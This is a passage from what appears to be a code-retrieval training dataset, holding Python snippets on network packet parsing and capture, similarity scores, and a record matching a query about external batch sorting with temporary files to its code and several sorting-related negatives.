self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n elif pkt.header.mtype == MSG['REQ_STOP'] or pkt.header.mtype == MSG['EXIT']:\n self.remove_client(ip)\n self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n\n if fd == self.datasock.fileno() and event is select.POLLOUT:\n # writable datasock, send data packets to clients\n for cli in self.clients:\n snc.snc_generate_packet_im(self.sc, pkt_p)\n pktstr = pkt_p.contents.serialize(self.meta.sp.size_g,\n self.meta.sp.size_p,\n self.meta.sp.bnc)\n try:\n # Construct data packet with serialized snc_packet\n self.datasock.sendto(CCPacket(CCHeader(MSG['DATA']), pktstr).packed(), (cli.ip, port))\n except:\n logging.warning(\"Caught exception in session %s.\"\n % (self.meta.sessionid,))\n self.lastIdle = datetime.now() # Refresh idle time\n self.housekeeping()", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = 
self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def _packets_from_tshark_sync(self, tshark_process, packet_count=None, timeout:float=3.0,\n max_data_length:int=10000):\n # NOTE: This has code duplication with the async version, think about how to solve this\n\n psml_structure, data = self.eventloop.run_until_complete(self._get_psml_struct(tshark_process.stdout))\n packets_captured = 0\n\n data = b\"\"\n try:\n while self.is_open.value:\n try:\n packet, data = self.eventloop.run_until_complete(\n self._get_packet_from_stream(tshark_process.stdout, \n data,\n psml_structure=psml_structure,\n got_first_packet=packets_captured > 0, \n timeout=timeout))\n except EOFError:\n echo(\"Caught EOF\", file=Interceptor.stdout)\n self._log.debug(\"EOF reached (sync)\")\n break\n\n if(packet is False): continue\n\n if packet:\n packets_captured += 1\n yield 
packet\n if packet_count and packets_captured >= packet_count:\n break\n if len(data) > max_data_length:\n data = b''\n finally:\n if tshark_process in self._running_processes:\n self.eventloop.run_until_complete(self._cleanup_subprocess(tshark_process))", "def agent_player(env_name, ip):\n\n # Create the main generator\n receiver_gen = atari_frames_generator(env_name, ip)\n\n # Loop\n while True:\n\n # Receive\n frame, termination = next(receiver_gen)\n\n # Skip if repeated\n assert termination in (\"continue\", \"last\", \"repeated_last\")\n if termination == \"repeated_last\":\n continue\n\n # Return\n yield frame", "def read_pkt_line(self):\n if self._readahead is None:\n read = self.read\n else:\n read = self._readahead.read\n self._readahead = None\n\n try:\n sizestr = read(4)\n if not sizestr:\n raise HangupException()\n size = int(sizestr, 16)\n if size == 0:\n if self.report_activity:\n self.report_activity(4, \"read\")\n return None\n if self.report_activity:\n self.report_activity(size, \"read\")\n pkt_contents = read(size - 4)\n except socket.error as e:\n raise GitProtocolError(e)\n else:\n if len(pkt_contents) + 4 != size:\n raise GitProtocolError(\n \"Length of pkt read %04x does not match length prefix %04x\"\n % (len(pkt_contents) + 4, size)\n )\n return pkt_contents", "def getPacket(self, index):\n\t\treturn self.packets[index.row()]", "def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))", "def sniffer():\n try:\n sniff(iface=INTERFACE, prn=print_frame, filter='udp and (port bootps or bootps)', store=0)\n except Exception as _e:\n print(\"ERROR - sniffer(): {} {}\".format(_e.args, _e.message))", "def from_physical_layer(conn, FRAME_LENGTH, FORMAT):\r\n frame = conn.recv(FRAME_LENGTH).decode(FORMAT)\r\n print(f\"[from_physical_layer] frame:{frame}\")\r\n return frame", "def recieve_can(offset):\n panda = Panda()\n while True:\n data = panda.can_recv()\n if data != []: \n for x in data:\n if x[0] == offset: \n if x[3] == 0: \n mes = f'{x[0]}, 0x{x[2].hex()}, {x[3]}'\n print(mes)", "def nat_openconn(destmac, destport, localip=None, localport=None, timeout = 5, forwarderIP=None,forwarderPort=None,usetimeoutsock=False): \r\n # cast the destmac to a string, internal methods may fail otherwise\r\n destmac = str(destmac)\r\n\r\n # use the forwarderIP and port provided\r\n if forwarderIP != None and forwarderPort != None:\r\n return _nat_try_connection_list([(forwarderIP,forwarderPort)],\r\n localip,localport,timeout,destmac,destport,usetimeoutsock) \r\n \r\n \r\n # lookup the destmac if forwarderIP and port are not provided\r\n else: \r\n # check the cache\r\n if destmac in NAT_SRV_CACHE:\r\n forwarders = NAT_SRV_CACHE[destmac]\r\n \r\n try:\r\n return _nat_try_connection_list(forwarders,localip,localport,timeout,destmac,destport,usetimeoutsock)\r\n \r\n except: # remove this entry from the cache\r\n del NAT_SRV_CACHE[destmac] \r\n \r\n # the cache failed, so do a fresh lookup\r\n forwarders = nat_server_list_lookup(destmac)\r\n socket = _nat_try_connection_list(forwarders,localip,localport,timeout,destmac,destport,usetimeoutsock)\r\n \r\n #this list succeded so add it to the cache\r\n NAT_SRV_CACHE[destmac] = forwarders\r\n \r\n return socket", "def payload_data(self, pkts):\n\n\t\t#Get all the payload bytes exchanged over MPTCP connections\n\t\tpayload_bytes = 0\n\t\tprint \"Determining the number of payload bytes excluding headers....\"\n\t\t#DSS = 0x2\n\t\tfor i in 
range(len(pkts)):\n\t\t\tif(TCPOption_MP in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 2 and Raw in pkts[i]):\n\t\t\t\tpayload_bytes += len(pkts[i][Raw].load)\n\t\t\t\t#print(\"DSN: %s; subflow_seqnum: %s; Data(bytes): %s\" % (pkts[i][TCPOption_MP].mptcp.dsn, pkts[i][TCPOption_MP].mptcp.subflow_seqnum, len(pkts[i][Raw].load)))\n\n\t\tprint \"Total Number of payload bytes in the file (entire MPTCP connections) excluding headers): %s\" % (payload_bytes)\n\t\t#MPTCP WITH SUBFLOW CONNECTIONS\n\t\t#MPTCP_JOINs = 0x1\n\t\tprint \"============================================================\"\n\t\tprint \"SUBFLOW Connections with their respective MPTCP connection (identified by connectionID)\"\n\t\tfor i in range(len(pkts)):\n\n\t\t\t#Initial Join Message\n\t\t\t#rcv_token Identifies the connection to which the subflow belongs: connectionID\n\t\t\tif(MPTCP_JoinSYN in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 1):\n\t\t\t\tprint(\"New subflow: connectionID: %s; src: %s; dest: %s; snd_nonce: %s\" % (pkts[i][TCPOption_MP].mptcp.rcv_token, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_nonce))\n\n\t\t#TODO: Now Need to track per-connection and per-subflow state", "def test_overlap1(self):\n\n fragments = []\n for _, _, frags_300, frags_200 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_300)\n else:\n for i, j in zip(frags_200, frags_300):\n fragments.extend(i)\n fragments.extend(j)\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()\n\n # run it all to verify correctness\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()", "def sniff_offline(args):\n print('viewer: reading from ' + args.read)\n\n try:\n with open(args.read, 'rb') as f:\n reader = dpkt.pcap.Reader(f)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n ts, pkt = next(iter(reader))\n ret = parse_ICMP_Echo(ts, pkt)\n\n if ret and args.count:\n count -= 1\n except FileNotFoundError as e:\n print('File \\'{}\\' not found.'.format(args.read))\n sys.exit(1)\n except StopIteration:\n sys.exit(0)", "def packet_to_kml(packet, reader):\n\n try:\n src_ip = packet[IP].src\n src_kml = ip_to_kml(src_ip, reader)\n except:\n src_kml = None\n try:\n dest_ip = packet[IP].dest\n dest_kml = ip_to_kml(dest_ip, reader)\n except:\n dest_kml = None\n\n if src_kml is not None and dest_kml is not None:\n connect_kml = ips_to_line_kml(src_ip, dest_ip, reader)\n print(\"Added connection\")\n else:\n connect_kml = None\n\n return src_kml, dest_kml, connect_kml", "def create_stream(cls, packet_sizes, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_if, cls.src_if)\n payload = cls.info_to_payload(info)\n p = (\n IP(id=info.index, src=cls.src_if.remote_ip4, dst=cls.dst_if.remote_ip4)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n size = packet_sizes[(i // 2) % len(packet_sizes)]\n cls.extend_packet(p, size, cls.padding)\n info.data = p", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def give_packets(self, packets, verbose=False, cache=False, tunnel=None, source_sock_addr=None):\n assert isinstance(packets, list)\n assert all(isinstance(packet, str) for packet in packets)\n 
assert isinstance(verbose, bool)\n assert isinstance(cache, bool)\n assert tunnel is None, \"TUNNEL property is set using init_socket(...)\"\n assert source_sock_addr is None or isinstance(source_sock_addr, tuple), type(source_sock_addr)\n if verbose:\n logger.debug(\"giving %d bytes\", sum(len(packet) for packet in packets))\n if source_sock_addr is None:\n source_sock_addr = self.lan_address\n candidate = Candidate(source_sock_addr, self._tunnel)\n self._dispersy.on_incoming_packets([(candidate, packet) for packet in packets], cache=cache, timestamp=time())\n return packets" ]
[ "0.5710354", "0.5529603", "0.5436237", "0.5389503", "0.5370659", "0.5341635", "0.5319951", "0.5312948", "0.5296589", "0.52821374", "0.5232271", "0.5231817", "0.5208476", "0.52023923", "0.51755023", "0.5116855", "0.5112408", "0.5110333", "0.5092085", "0.5089987", "0.5086152", "0.5080938", "0.5051528", "0.5051528", "0.5011665", "0.50084186", "0.5007459", "0.49958622", "0.49733213", "0.49542275", "0.495417", "0.49498022", "0.49460396", "0.49303383", "0.48881605", "0.48586914", "0.48477185", "0.4837219", "0.48050243", "0.4789931", "0.47893512", "0.4788178", "0.47869468", "0.47613704", "0.4752663", "0.47500047", "0.47426605", "0.47332984", "0.47233394", "0.4714982", "0.47131625", "0.4697844", "0.4697158", "0.46857035", "0.46792635", "0.46711436", "0.4664068", "0.4660284", "0.46519208", "0.46505415", "0.46443844", "0.46024713", "0.45999685", "0.45896453", "0.4589577", "0.45727187", "0.45695475", "0.4561564", "0.45561558", "0.45406654", "0.45351273", "0.45255303", "0.4524231", "0.45210078", "0.4517039", "0.4505856", "0.44961685", "0.4495365", "0.448878", "0.44851944", "0.44837207", "0.44794542", "0.44755214", "0.44672287", "0.4463968", "0.44579118", "0.44571388", "0.44558287", "0.44551775", "0.44505128", "0.4447302", "0.4434669", "0.4434428", "0.4431039", "0.44281664", "0.44205582", "0.44168368", "0.4408865", "0.44071707", "0.4406922" ]
0.69073343
0
batch sort helper with temporary files, supports sorting large stuff
def batch_sort(input_iterator, output_path, buffer_size=1024**2, output_class=None):
    if not output_class:
        output_class = input_iterator.__class__
    chunks = []
    try:
        while True:
            current_chunk = list(islice(input_iterator,buffer_size))
            if not current_chunk:
                break
            current_chunk.sort()
            output_chunk_name = os.path.join(TMPD, "%06i" % len(chunks))
            output_chunk = output_class(output_chunk_name)
            for elem in current_chunk:
                output_chunk.write(elem.obj)
            output_chunk.close()
            chunks.append(input_iterator.__class__(output_chunk_name))
        output_file = output_class(output_path)
        for elem in heapq.merge(*chunks):
            output_file.write(elem.obj)
        output_file.close()
    except:
        raise
    finally:
        for chunk in chunks:
            try:
                chunk.close()
                os.remove(chunk.name)
            except Exception:
                pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def batchSort(input, output, key, buffer_size, tempdir):\n def merge(key=None, *iterables):\n if key is None:\n keyed_iterables = iterables\n else:\n Keyed = namedtuple(\"Keyed\", [\"key\", \"obj\"])\n keyed_iterables = [(Keyed(key(obj), obj) for obj in iterable)\n for iterable in iterables]\n for element in heapq.merge(*keyed_iterables):\n yield element.obj\n\n tempdir = os.path.join(tempdir, str(uuid.uuid4()))\n os.makedirs(tempdir)\n chunks = []\n try:\n with open(input, 'rb', 64 * 1024) as inputFile:\n inputIter = iter(inputFile)\n while True:\n current_chunk = list(islice(inputIter, buffer_size))\n if not current_chunk:\n break\n current_chunk.sort(key=key)\n output_chunk = open(\n os.path.join(tempdir, '%06i' % len(chunks)), 'w+b',\n 64 * 1024)\n chunks.append(output_chunk)\n output_chunk.writelines(current_chunk)\n output_chunk.flush()\n output_chunk.seek(0)\n with open(output, 'wb', 64 * 1024) as output_file:\n output_file.writelines(merge(key, *chunks))\n finally:\n for chunk in chunks:\n try:\n chunk.close()\n os.remove(chunk.name)\n except Exception:\n pass\n print(\"sorted file %s ready\" % (output))", "def f_way_sort(buffer_size: int, input_paths: list, output_path: str):\n pass", "def external_sort(input_file_name, block_size, output_file_name=None):\n if output_file_name is None:\n output_file_name = input_file_name\n sorter = ExternalSort(input_file_name, block_size, output_file_name)\n sorter.run()", "def step020():\n logger.logMessage('Begin: Sorting records')\n sortCommand = 'sort {0} -t \\';\\' --key 2 -o {1}'.format(candidatesFile,sortedCandidatesFile) \n rc = os.system(sortCommand)\n if rc != 0:\n raise Exception('Error returned by sort program: {0:d}'.format(rc))\n logger.logMessage('End : Sorting records')", "def test_sort():\n data = [\"filename_{}.py\".format(i) for i in range(200)]\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def testSorting(self):\n mtt.makeTempDirParent()\n shuffledTargets = list(g_targetBlocks)\n for i in xrange(0, 200):\n tmpDir = os.path.abspath(mtt.makeTempDir('sorting'))\n random.shuffle(g_nonTargetBlocks)\n random.shuffle(shuffledTargets)\n shuffledBlocks = list(shuffledTargets)\n lower = 0\n for j in xrange(0, len(g_nonTargetBlocks)):\n # randomly insert the non target blocks, but keep a record\n # of their relative order.\n index = random.randint(lower, len(shuffledBlocks))\n shuffledBlocks.insert(index, g_nonTargetBlocks[j])\n lower = index + 1\n testMaf = mtt.testFile(os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n ''.join(shuffledBlocks), g_headers)\n parent = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = [os.path.abspath(os.path.join(parent, 'test', 'mafSorter'))]\n cmd += ['--maf', os.path.abspath(os.path.join(tmpDir, 'test.maf')), \n '--seq', 'hg18.chr7']\n outpipes = [os.path.abspath(os.path.join(tmpDir, 'sorted.maf'))]\n mtt.recordCommands([cmd], tmpDir, outPipes=outpipes)\n mtt.runCommandsS([cmd], tmpDir, outPipes=outpipes)\n self.assertTrue(mafIsSorted(os.path.join(tmpDir, 'sorted.maf')))\n mtt.removeDir(tmpDir)", "def mysorted(*args, **kwargs):\n _ = kwargs.pop(\"chunksize\", None)\n return sorted(*args, **kwargs)", "def _fix_shortsort(self):\n test_dir = join_path(self.install_test_root, self.test_src_dir)\n filter_file(\"../src/\", \"\", join_path(test_dir, \"testshortsort.sh\"))", "def sort_pairs(abx_file, by, memory=1000, tmpdir=None):\n # estimate of the amount of data to be sorted\n with h5py.File(abx_file, 'a') as fh:\n n = fh['/pairs/' + str(by)].shape[0]\n i = 
fh['/pairs/' + str(by)].dtype.itemsize\n\n # harmonize units in Ko\n memory = 1000 * memory\n amount = n * i / 1000.\n\n # be conservative: aim at using no more than 3/4 the available\n # memory if enough memory take one chunk (this will do an\n # unnecessary full write and read of the file... could be\n # optimized easily, would it be beneficial to have large\n # o_buffer_size as well?)\n if amount <= 0.75 * memory:\n buffer_size = amount\n\n # else take around 30 chunks if possible (this seems efficient\n # given the current implem, using a larger number of chunks\n # efficiently might be possible if the reading chunks part of the\n # sort was cythonized ?)\n elif amount / 30. <= 0.75 * memory:\n buffer_size = amount / 30.\n\n # else take minimum number of chunks possible given the\n # available RAM\n else:\n buffer_size = 0.75 * memory\n\n # finally sort the pairs in place\n handler = h5_handler.H5Handler(abx_file, '/pairs/', str(by))\n handler.sort(buffer_size=buffer_size, tmpdir=tmpdir)", "def call_coreutils_sort(cmds, tmpfn=None, stdin=None):\n input_is_stream = stdin is not None\n output_is_stream = tmpfn is None\n\n try:\n # coming from an iterator, sending as iterator\n if input_is_stream and output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is stream, output is stream')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n p = subprocess.Popen(cmds,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n for line in stdin:\n p.stdin.write(line.encode())\n p.stdin.close() # This is important to prevent deadlocks\n\n output = (i.decode('UTF-8') for i in p.stdout)\n stderr = None\n\n # coming from an iterator, writing to file\n if input_is_stream and not output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is stream, output is file')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n outfile = open(tmpfn, 'wb')\n p = subprocess.Popen(cmds,\n stdout=outfile,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n if hasattr(stdin, 'read'):\n stdout, stderr = p.communicate(stdin.read())\n p.stdin.close()\n else:\n for item in stdin:\n p.stdin.write(item.encode())\n stdout, stderr = p.communicate()\n p.stdin.close()\n output = tmpfn\n outfile.close()\n\n # coming from a file, sending as iterator\n if not input_is_stream and output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is filename, output is stream')\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n p = subprocess.Popen(cmds,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n output = (i.decode('UTF-8') for i in p.stdout)\n stderr = None\n\n # file-to-file\n if not input_is_stream and not output_is_stream:\n logger.debug('helpers.call_coreutils_sort(): input is filename, output is filename (%s)', tmpfn)\n logger.debug('helpers.call_coreutils_sort(): cmds=%s', ' '.join(cmds))\n outfile = open(tmpfn, 'wb')\n p = subprocess.Popen(cmds,\n stdout=outfile,\n stderr=subprocess.PIPE,\n bufsize=BUFSIZE,\n env={'LC_ALL': 'C'})\n stdout, stderr = p.communicate()\n output = tmpfn\n outfile.close()\n\n if stderr:\n if isinstance(stderr, bytes):\n stderr = stderr.decode('UTF_8')\n raise BEDToolsError(subprocess.list2cmdline(cmds), stderr)\n\n except (OSError, IOError) as err:\n print('%s: %s' % (type(err), os.strerror(err.errno)))\n print('The command was:\\n\\n\\t%s\\n' 
% subprocess.list2cmdline(cmds))\n raise err\n\n return output", "def sort(unsorted_bed_file_name, sorted_bed_file_name):\n array_call = ['sort', '-k', '1,1', '-k', '2,2n',\n unsorted_bed_file_name, '-o', sorted_bed_file_name]\n p = _handleExceptionAndCheckCall(array_call)\n return p", "def test_benchmark_sorted(benchmark, benchmark_items_fixture):\n do_benchmark(benchmark_items_fixture, sorted, benchmark)", "def test_benchmark_xsorted(partition_size, benchmark, benchmark_items_fixture):\n xsorted_ = xsorter(partition_size=partition_size)\n do_benchmark(benchmark_items_fixture, xsorted_, benchmark)", "def mergeAllSortedFiles():\n entries = os.listdir('output/Temp/input')\n for entry in entries:\n arr = []\n with open(\"output/Temp/input/\" + entry) as file:\n for line in file:\n line = int(line.strip())\n arr.append(line)\n mergeSortedToFile(arr)", "def sortDataFileByModel(self, fileByModel):\n t1 = time.time()\n print(\"sorting files....\")\n ensure_dir(SORT_DIR)\n processPool = []\n for model in list(fileByModel.keys()):\n mergedFile = '%s/%s.txt' % (MERGE_DIR, model)\n sortedFile = '%s/%s.txt' % (SORT_DIR, model)\n if self.ignore_invalid:\n key = eval('lambda l: -float(l.split(\"' + self.delimiter +\n '\")[2] or 0.0)')\n else:\n key = eval('lambda l: -float(l.split(\"' + self.delimiter +\n '\")[2])')\n process = Process(target=batchSort, args=(mergedFile, sortedFile, key, self.buffer_size, self.tempdir))\n process.start()\n processPool.append(process)\n\n for process in processPool:\n process.join()\n t2 = time.time()\n print(\"sorting files take %ss\" % (t2 - t1))", "def alphabetize_chunk_files(base):\n (base, ext) = os.path.splitext(base)\n\n names = []\n for name in glob.glob('{base}*{ext}'.format(base=base, ext=ext)):\n try:\n names.append(parse_chunk_name(name))\n except ValueError:\n pass\n\n max_width = max([len(parts[2]) for parts in names])\n\n sources = ['_'.join(parts) + ext for parts in names]\n dests = [get_chunk_file_name(base + ext,\n (int(parts[1]), int(parts[2])),\n width=max_width) for parts in names]\n\n for src, dest in zip(sources, dests):\n shutil.move(src, dest)\n\n return dests", "def sortData(unsortedList):\r\n # We will begin with the data from the bubble sort\r\n bubbleSortData = []\r\n bubbleSortOptData = []\r\n selectionSortData = []\r\n insertionSortData = []\r\n\r\n # The range of testing will begin at zero\r\n testRange = 0\r\n\r\n for i in range(len(unsortedList) + 1):\r\n bubbleSortCount = Sorts.bubbleSort(unsortedList[:testRange])\r\n bubbleSortData.append(bubbleSortCount)\r\n\r\n bubbleSortOptCount = Sorts.bubbleSortOpt(unsortedList[:testRange])\r\n bubbleSortOptData.append(bubbleSortOptCount)\r\n\r\n selectionSortCount = Sorts.selectionSort(unsortedList[:testRange])\r\n selectionSortData.append(selectionSortCount)\r\n\r\n insertionSortCount = Sorts.insertionSort(unsortedList[:testRange])\r\n insertionSortData.append(insertionSortCount)\r\n testRange += 1\r\n\r\n # Write the sort data to text file\r\n writeSortDataToText(bubbleSortData, bubbleSortOptData, selectionSortData, insertionSortData)", "def sort_music_data(sort_by = None):\n for lists in read_file():\n print(lists)\n pass", "def main():\n os.chdir('FilesToSort')\n extension_to_category = {}\n for filename in os.listdir('.'):\n if os.path.isdir(filename):\n continue\n extension = filename.split('.')[-1]\n make_subdirectories(extension, extension_to_category)\n shutil.move(filename, extension_to_category[extension])", "def main():\n\n list_size = [500, 1000, 10000]\n sort = {'Insertion': 0, 
'Shell': 0, 'Python': 0}\n\n for t_list in list_size:\n counter = 0\n while counter < 100:\n list_test = list_gen(t_list)\n sort['Insertion'] += insertion_sort(list_test)[0]\n sort['Shell'] += shell_sort(list_test)[0]\n sort['Python'] += python_sort(list_test)[0]\n counter += 1\n\n print 'For the list containing %s lines:' % (t_list)\n\n for st in sort:\n print ('The %s Search took %.5f seconds to run.') % (st, sort[st] / counter)", "def _sort_by_name(bam_fn):", "def TurboSort(input_folder, output_file):\r\n\r\n atom_dict = {}\r\n for linelist in os.listdir(input_folder):\r\n file_line = 1\r\n with open(os.path.join(input_folder, linelist), \"r\") as fin:\r\n lines = fin.readlines()\r\n while file_line < len(lines):\r\n line_index = file_line - 1\r\n header, atomic_sym = lines[line_index], lines[line_index + 1]\r\n atomic_lines = int(header.split()[4])\r\n start = line_index + 2\r\n end = start + atomic_lines\r\n splice = lines[start: end]\r\n file_line = end + 1\r\n if atomic_sym in atom_dict.keys():\r\n atomic_lines_previous = int(atom_dict[atomic_sym][0].split()[4])\r\n atomic_lines += atomic_lines_previous\r\n start_line, end_line_previous = atom_dict[atomic_sym][0][:27], atom_dict[atomic_sym][0][27:]\r\n end_line_updated = end_line_previous.replace(str(atomic_lines_previous), str(atomic_lines))\r\n if len(end_line_updated) > 10:\r\n diff = len(end_line_updated) - 10\r\n end_line_updated = end_line_updated[diff:]\r\n atom_dict[atomic_sym][0] = start_line + end_line_updated\r\n elif len(end_line_updated) < 10:\r\n diff = 10 - len(end_line_updated)\r\n atom_dict[atomic_sym][0] = start_line + \" \"*diff + end_line_updated\r\n else:\r\n atom_dict[atomic_sym][0] = start_line + end_line_updated\r\n # Sorts each element by wavelength\r\n atom_dict[atomic_sym].extend(splice)\r\n temp = atom_dict[atomic_sym][2:]\r\n temp.sort()\r\n atom_dict[atomic_sym] = atom_dict[atomic_sym][:2]\r\n atom_dict[atomic_sym].extend(temp)\r\n else:\r\n header = [header, atomic_sym]\r\n header.extend(splice)\r\n atom_dict[atomic_sym] = header\r\n\r\n # Sorts each element block by atomic number\r\n vals = list(atom_dict.values())\r\n for val in vals:\r\n \"\\n\".join(val)\r\n vals.sort()\r\n lines = []\r\n for val in vals:\r\n lines.extend(val)\r\n\r\n with open(output_file, \"w\") as fout:\r\n for line in lines:\r\n fout.write(line)", "def sort_files(file_list, set_name, time_freq, normalise):\n \n out_dict = {}\n order = []\n \n if file_list:\n\tfor item in file_list:\n key = tuple(item[0:3])\n window = int(item[2])\n out_dict[key] = nio.InputData(item[0], item[1], runave=window, normalise=normalise)\n out_dict[key].tag = item[3]\n out_dict[key].window = window\n out_dict[key].set = set_name\n out_dict[key].datetimes = runave_time_correction(out_dict[key].datetime_axis()[:], time_freq)\n order.append(key) \n else:\n outdict = None\n\torder = None\n\n return out_dict, order", "def sort_chunks(self):\n\n first = True\n\n all_chunks = dict(self.dirty_chunk_cache)\n all_chunks.update(self.chunk_cache)\n self.chunk_cache.clear()\n self.dirty_chunk_cache.clear()\n for coords, chunk in all_chunks.iteritems():\n if chunk.dirty:\n if first:\n first = False\n self.save_chunk(chunk)\n self.chunk_cache[coords] = chunk\n else:\n self.dirty_chunk_cache[coords] = chunk\n else:\n self.chunk_cache[coords] = chunk", "def stochastic_filesort(stochastic_file_csv, taw_tup, var_list, model_dates, runs, output_root):\n\n print 'doing a file sort on the csv created by stochastic file finder'\n\n main_dictionary = {}\n\n taw_list = 
make_taw_list(taw_tup)\n\n open_read = time.time()\n rzsm_lst = []\n ro_lst = []\n eta_lst = []\n infil_lst = []\n print 'opening'\n with open(stochastic_file_csv, 'r') as rfile:\n print 'iterating on lines'\n line_start = time.time()\n\n for j, line in enumerate(rfile):\n line_item = line.split(',')\n\n numpy_path = line_item[0]\n string_date = line_item[1][:-1]\n numpy_date = datetime.strptime(string_date, '%Y-%m-%d')\n\n numpy_filename = os.path.split(numpy_path)[1]\n # print numpy_filename\n # print j, line\n if 'rzsm' in numpy_filename:\n rzsm_lst.append((numpy_path, numpy_date))\n elif 'ro' in numpy_filename:\n ro_lst.append((numpy_path, numpy_date))\n elif 'eta' in numpy_filename:\n eta_lst.append((numpy_path, numpy_date))\n elif 'infil' in numpy_filename:\n infil_lst.append((numpy_path, numpy_date))\n\n # if j > 1000000:\n # break\n if not j%10000:\n print j\n print('file line count {}'.format(j))\n line_end = (time.time() - line_start)\n print 'line time elapsed {}'.format(line_end)\n elapsed = (time.time() - open_read)\n print 'time elapsed to parse {}'.format(elapsed)\n\n # TODO now use sorted(list5, key=lambda vertex: (degree(vertex), vertex)) (firstkey, secondkey) tuple to sort by seed then TAW\n\n # sorting by a tuple of first, second and third criteria (seed, taw, date)\n def keyfunc(x):\n return os.path.split(x[0])[1].split('_')[6], os.path.split(x[0])[1].split('_')[4], x[1]\n\n rzsm_lst.sort(key=keyfunc)\n 